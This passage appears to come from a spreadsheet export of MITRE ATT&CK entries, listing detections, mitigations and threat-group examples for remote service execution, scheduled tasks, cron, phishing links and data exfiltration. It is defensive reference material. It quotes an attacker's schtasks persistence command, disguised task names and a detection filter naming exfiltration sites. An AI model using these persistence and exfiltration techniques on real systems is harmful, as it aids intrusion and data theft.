[Winexe](https://attack.mitre.org/software/S0191) installs a service on the remote system, executes the command, then uninstalls the service.(Citation: Secpod Winexe June 2017)
Wingbird
[Wingbird](https://attack.mitre.org/software/S0176) uses services.exe to register a new autostart service named "Audit Service" using a copy of the local lsass.exe file.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)
Winnti for Windows
[Winnti for Windows](https://attack.mitre.org/software/S0141) can run as a service using svchost.exe.(Citation: Novetta Winnti April 2015)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can create a new service for execution.(Citation: Talos ZxShell Oct 2014)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) can execute its service if the Service key exists. If the key does not exist, [gh0st RAT](https://attack.mitre.org/software/S0032) will create and run the service.(Citation: Gh0stRAT ATT March 2019)
xCmd
[xCmd](https://attack.mitre.org/software/S0123) can be used to execute binaries on remote systems by creating and starting a service.(Citation: xCmd)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor commands and scripts executed on virtual machines. In Azure, usage of Azure RunCommand can be identified via the Azure Activity Logs, and additional details on the result of  executed jobs are available in the `C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows` directory on Windows virtual machines.(Citation: Mandiant Azure Run Command 2021)
Process Creation
Monitor virtual machines for the creation of processes associated with cloud virtual machine agents. In Windows-based Azure machines, monitor for the WindowsAzureGuestAgent.exe process.(Citation: Mandiant Azure Run Command 2021)
Script Execution
Monitor commands and scripts executed on virtual machines. In Azure, usage of Azure RunCommand can be identified via the Azure Activity Logs, and additional details on the result of  executed jobs are available in the `C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows` directory on Windows virtual machines.(Citation: Mandiant Azure Run Command 2021)
Privileged Account Management
Limit the number of cloud accounts with permissions to remotely execute commands on virtual machines, and ensure that these are not used for day-to-day operations. In Azure, limit the number of accounts with the roles Azure Virtual Machine Contributer and above, and consider using temporary Just-in-Time (JIT) roles to avoid permanently assigning privileged access to virtual machines.(Citation: Mandiant Azure Run Command 2021) In Azure AD, limit the number of Global and Intune administrators to only those required. In AWS, limit users with permission to execute the `ssm:SendCommand` action, and use tags to restrict the number of machines those users can execute commands on.(Citation: AWS Setting Up Run Command)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used Azure Run Command and Azure Admin-on-Behalf-of (AOBO) to execute code on virtual machines.(Citation: MSTIC Nobelium Oct 2021)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can execute commands on Azure virtual machines using the VM agent.(Citation: AADInternals Root Access to Azure VMs)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can run commands on EC2 instances using AWS Systems Manager Run Command.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
Container Creation
Monitor for newly constructed containers that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
File Creation
Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
File Modification
Monitor for changes made to files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
Process Creation
Monitor for newly executed processes that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
Scheduled Job Creation
Monitor newly constructed scheduled jobs that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.
Audit
Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)
Operating System Configuration
Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl&lt;/code&gt;. The setting can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)
Privileged Account Management
Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)
User Account Management
Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems.
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) used the command &lt;code&gt;schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system&lt;/code&gt; for persistence.(Citation: TrendMicro EarthLusca 2022)
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) has used the scheduled tasks `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`
 to establish persistence.(Citation: Mandiant APT41)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447)'s second stage DLL has set a timer using “timeSetEvent” to schedule its next execution.(Citation: Talos Lokibot Jan 2021)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) schedules the execution one of its modules by creating a new scheduler task.(Citation: Kaspersky ProjectSauron Technical Analysis)
StrifeWater
[StrifeWater](https://attack.mitre.org/software/S1034) has create a scheduled task named `Mozilla\Firefox Default Browser Agent 409046Z0FF4A39CB` for persistence.(Citation: Cybereason StrifeWater Feb 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Often these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage._x005F_x000D_
Perform application deployment at regular times so that irregular deployment activity stands out.
Process Creation
Monitor for newly executed processes that does not correlate to known good software. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. 
Active Directory Configuration
Ensure proper system and access isolation for critical network systems through use of group policy.
Limit Software Installation
Restrict the use of third-party software suites installed within an enterprise network. 
Multi-factor Authentication
Ensure proper system and access isolation for critical network systems through use of multi-factor authentication.
Network Segmentation
Ensure proper system isolation for critical network systems through use of firewalls.
Password Policies
Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network.
Privileged Account Management
Grant access to application deployment systems only to a limited number of authorized administrators.
Remote Data Storage
If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.
Update Software
Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
User Account Management
Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers in the same environment. Ensure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required. Ensure proper system and access isolation for critical network systems through use of account privilege separation.
User Training
Have a strict approval policy for use of deployment systems.
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used PDQ Deploy to move [AvosLocker](https://attack.mitre.org/software/S1053) and tools across the network.(Citation: Cisco Talos Avos Jun 2022)
APT32
[APT32](https://attack.mitre.org/groups/G0050) compromised McAfee ePO to move laterally by distributing malware as a software deployment task.(Citation: FireEye APT32 May 2017)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the commercially available tool RemoteExec for agentless remote code execution.(Citation: Microsoft Prestige ransomware October 2022)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used RAdmin, a remote software tool used to remotely control workstations and ATMs.(Citation: Group IB Silence Sept 2018)
Threat Group-1314
[Threat Group-1314](https://attack.mitre.org/groups/G0028) actors used a victim's endpoint management platform, Altiris, for lateral movement.(Citation: Dell TG-1314)
Wiper
It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the [Wiper](https://attack.mitre.org/software/S0041) malware.(Citation: Dell Wiper)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
malicious documents and files that are downloaded from a link and executed on the user's computer
Network Connection Creation
Monitor for newly constructed web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious detinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).
Network Intrusion Prevention
If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.
Restrict Web-Based Content
If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious files.
User Training
Use user training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.
C0011
During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) relied on student targets to click on a malicious link sent via email.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors lured users into clicking a malicious link which led to the download of a  ZIP archive containing a malicious .LNK file.(Citation: FireEye APT29 Nov 2018)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors enticed users to click on links in spearphishing emails to download malware.(Citation: McAfee Night Dragon)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) lured users into executing a malicious link to disclose private account information or provide initial access.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors relied on a victim clicking on a malicious link sent via email.(Citation: Cylance Dust Storm)
Operation Spalax
During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors relied on a victim to click on a malicious link distributed via phishing emails.(Citation: ESET Operation Spalax Jan 2021)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used various forms of spearphishing attempting to get a user to click on a malicous link.(Citation: MSTIC NOBELIUM May 2021)(Citation: Secureworks IRON RITUAL USAID Phish May 2021)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has lured victims into clicking malicious links delivered through spearphishing.(Citation: FireEye Clandestine Wolf)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has lured users to click links to malicious HTML applications delivered via spearphishing emails.(Citation: FireEye APT33 Sept 2017)(Citation: Symantec Elfin Mar 2019)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious link.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious links to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)	 
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.(Citation: Talos Cobalt Group July 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: Secureworks GOLD KINGSWOOD September 2018)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has lured victims into clicking on a malicious link sent through spearphishing.(Citation: TrendMicro Confucius APT Aug 2021)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used malicious links to lure users into executing malicious payloads.(Citation: Google EXOTIC LILY March 2022)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006)  has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022)
Elderwood
[Elderwood](https://attack.mitre.org/groups/G0066) has leveraged multiple types of spearphishing in order to attempt to get a user to open links.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has attempted to lure users to click on a malicious link within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) has sent spearphishing emails designed to trick the recipient into opening malicious shortcut links which downloads a .LNK file.(Citation: ESET EvilNum July 2020)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts).(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used malicious links to lure victims into downloading malware.(Citation: CrowdStrike Carbon Spider August 2021)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used emails with malicious links to lure victims into installing malware.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has lured victims into clicking malicious links.(Citation: KISA Operation Muzabi)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has relied upon users clicking on links to malicious files.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing email links attempting to get a user to click.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has lured victims into clicking malicious Dropbox download links delivered through spearphishing.(Citation: Kaspersky LuminousMoth July 2021)
Machete
[Machete](https://attack.mitre.org/groups/G0095) has has relied on users opening malicious links delivered through spearphishing to execute malware.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has attempted to lure victims into opening malicious links embedded in emails.(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)
Mofang
[Mofang](https://attack.mitre.org/groups/G0103)'s spearphishing emails required a user to click the link to connect to a compromised website.(Citation: FOX-IT May 2016 Mofang)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious links via email trick users into opening a RAR archive and running an executable.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020) 
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has distributed URLs in phishing e-mails that link to lure documents.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has sent malicious links including links directing victims to a Google Drive folder.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: McAfee Dianxun March 2021)(Citation: Proofpoint TA416 Europe March 2022)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has delivered malicious links to achieve execution on the target system.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to try to get users to click, download and open malicious files.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has lured targets to click on malicious links to gain execution in the target environment.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder APT April 2020)(Citation: Rewterz Sidewinder COVID-19 June 2020)(Citation: Cyble Sidewinder September 2020)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used malicious links to cloud and web services to gain execution on victim machines.(Citation: Proofpoint TA2541 February 2022)(Citation: FireEye NETWIRE March 2019)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to click links in emails and attachments. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has directed users to open URLs hosting malicious content.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used spearphishing via a link to get users to download and run their malware.(Citation: ESET Turla Mosquito Jan 2018)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used links embedded in e-mails to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims into clicking a malicious link delivered through spearphishing.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used malicious links in e-mails to lure victims into downloading malware.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584)'s spearphishing links required user interaction to navigate to the malicious website.(Citation: CISA AppleJeus Feb 2021)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has compromised victims via links to URLs hosting malicious content.(Citation: Unit 42 BackConfig May 2020)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: CrowdStrike Wizard Spider October 2020)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has relied upon a user downloading a file from a OneDrive link for execution.(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has relied upon users clicking on a malicious link delivered through spearphishing.(Citation: Trend Micro Banking Malware Jan 2019)(Citation: Carbon Black Emotet Apr 2019)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) has used malicious links to gain execution on victim machines.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) has relied upon users clicking on links to malicious documents.(Citation: Unit 42 NETWIRE April 2020)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has relied upon users clicking on a malicious link delivered through phishing.(Citation: Threatpost Hancitor)
Javali
[Javali](https://attack.mitre.org/software/S0528) has achieved execution through victims clicking links to malicious websites.(Citation: Securelist Brazilian Banking Malware July 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has relied on victims clicking on a malicious link delivered via email.(Citation: MalwareBytes LazyScripter Feb 2021)
Kerrdown
[Kerrdown](https://attack.mitre.org/software/S0585) has gained execution through victims opening malicious links.(Citation: Amnesty Intl. Ocean Lotus February 2021)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) has gained execution through victims opening malicious links.(Citation: Securelist Brazilian Banking Malware July 2020)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through convincing victims into clicking malicious links.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) has gained execution on targeted systems through luring users to click on links to malicious URLs.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) has relied on a user to click a malicious link within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious links in e-mails.(Citation: TrendMicro BlackTech June 2017)
Pony
[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into clicking links in spoofed emails from legitimate banks.(Citation: Malwarebytes Pony April 2016)	
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has gained execution through users opening malicious links.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)(Citation: Trend Micro Black Basta October 2022)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has relied upon users clicking on a malicious link delivered through phishing.(Citation: FireEye Shining A Light on DARKSIDE May 2021)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has relied on users to click on a malicious link delivered via a spearphishing.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Snip3
[Snip3](https://attack.mitre.org/software/S1086) has been executed through luring victims into clicking malicious links.(Citation: Telefonica Snip3 December 2021)
SpicyOmelette
[SpicyOmelette](https://attack.mitre.org/software/S0646) has been executed through malicious links within spearphishing emails.(Citation: Secureworks GOLD KINGSWOOD September 2018)
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has relied on victims to click on a malicious link send via phishing campaigns.(Citation: ZScaler Squirrelwaffle Sep 2021)
TSCookie
[TSCookie](https://attack.mitre.org/software/S0436) has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.(Citation: JPCert TSCookie March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All at jobs are stored in /var/spool/cron/atjobs/.
File Modification
Monitor for changes made to files for unexpected modifications to access permissions and attributes 
Process Creation
Monitor for newly constructed processes and/or command-lines that executed through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Scheduled Job Creation
Monitor for newly constructed scheduled jobs. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.
Audit
Review changes to the &lt;code&gt;cron&lt;/code&gt; schedule. &lt;code&gt;cron&lt;/code&gt; execution can be reviewed within the &lt;code&gt;/var/log&lt;/code&gt; directory. To validate the location of the &lt;code&gt;cron&lt;/code&gt; log file, check the syslog config at &lt;code&gt;/etc/rsyslog.conf&lt;/code&gt; or &lt;code&gt;/etc/syslog.conf&lt;/code&gt; 
User Account Management
&lt;code&gt;cron&lt;/code&gt; permissions are controlled by &lt;code&gt;/etc/cron.allow and /etc/cron.deny&lt;/code&gt;. If there is a &lt;code&gt;cron.allow&lt;/code&gt; file, then the user or users that need to use &lt;code&gt;cron&lt;/code&gt; will need to be listed in the file. &lt;code&gt;cron.deny&lt;/code&gt; is used to explicitly disallow users from using cron. If neither files exist, then only the super user is allowed to run cron.
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used cron to create pre-scheduled and periodic background jobs on a Linux system.(Citation: CISA AA20-239A BeagleBoyz August 2020)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) installed a cron job that downloaded and executed files from the C2.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can install itself as a cron job.(Citation: Medium Anchor DNS July 2020)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses crontab for persistence if it does not have root privileges.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)
GoldMax
The [GoldMax](https://attack.mitre.org/software/S0588) Linux variant has used a crontab entry with a &lt;code&gt;@reboot&lt;/code&gt; line to gain persistence.(Citation: CrowdStrike StellarParticle January 2022)
Janicab
[Janicab](https://attack.mitre.org/software/S0163) used a cron job for persistence on Mac devices.(Citation: Janicab)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has used crontab to download and run shell scripts every minute to ensure persistence.(Citation: Aqua Kinsing April 2020)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can use crontabs to establish persistence.(Citation: Red Canary NETWIRE January 2020)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) can use Cron to create periodic and pre-scheduled background jobs.(Citation: Leonardo Turla Penquin May 2020)
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) has installed itself via crontab.(Citation: Trend Micro Skidmap)
SpeakUp
[SpeakUp](https://attack.mitre.org/software/S0374) uses cron tasks to ensure persistence. (Citation: CheckPoint SpeakUp Feb 2019)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can create a cronjob for persistence if it determines it is on a Linux system.(Citation: Unit42 Xbash Sept 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to exfiltrate data over Bluetooth rather than the command and control channel.
File Access
Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection. Also monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces. 
Network Connection Creation
Monitor for newly constructed network connections that may attempt to exfiltrate data over Bluetooth rather than the command and control channel. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.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such as the usage of abnormal/unexpected protocols.
Disable or Remove Feature or Program
Disable Bluetooth in local computer security settings or by group policy if it is not needed within an environment.
Operating System Configuration
Prevent the creation of new network adapters where possible.
Flame
[Flame](https://attack.mitre.org/software/S0143) has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.(Citation: Symantec Beetlejuice)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze network traffic for exfiltration attempts using text storage sites, i.e. POST requests to text storage sites. 
Network Traffic Flow
Monitor network data for uncommon data flows, specifically to text storage sites such as `Pastebin[.]com`, `Paste[.]ee`, and `Pastebin[.]pl`.
Restrict Web-Based Content
Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed command and arguments that may exfiltrate data to a code repository rather than over their primary command and control channel.
File Access
Monitor for files being accessed to exfiltrate data to a code repository rather than over their primary command and control channel.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Monitor for use of code repositories for data exfiltration. 
&lt;h4&gt;Analytic 1 - Suspicious Data Exfil&lt;/h4&gt;
&lt;code&gt;suspicious_exfil = filter network_traffic where (httpHost = "github.com" or httpHost ="justpaste.it" or httpHost= "pastebin.com" or httpHost="onpaste.com" or httpHost="transfernow.net" or httpHost = "codepad.org")&lt;/code&gt;
Restrict Web-Based Content
Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.
Empire
[Empire](https://attack.mitre.org/software/S0363) can use GitHub for data exfiltration.(Citation: Github PowerShell Empire)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor cloud-based file hosting services, such as Google Drive and Microsoft OneDrive, for unusual instances of file downloads – for example, many downloads by a single user in a short period of time. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies. Additionally, data loss prevention policies can be defined to detect and alert on exfiltration events on particularly sensitive data. 
Cloud Storage Access
Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set and are allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.
Command Execution
Monitor executed commands and arguments that may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.
File Access
Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Data Loss Prevention
Data loss prevention can detect and block sensitive data being uploaded via web browsers.
Filter Network Traffic
Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. Cloud service providers support IP-based restrictions when accessing cloud resources. Consider using IP allowlisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.
Network Segmentation
